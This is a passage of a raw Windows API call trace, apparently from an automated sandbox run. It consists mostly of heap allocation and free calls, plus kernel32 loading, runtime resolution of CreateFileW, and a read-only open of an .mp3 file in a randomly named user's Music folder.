(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0114.588] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0114.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0114.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0114.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.591] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.596] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0114.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0114.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.596] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0114.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0114.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0114.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\mxxesxxst_.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0114.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0114.600] FreeLibrary (hLibModule=0x772d0000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 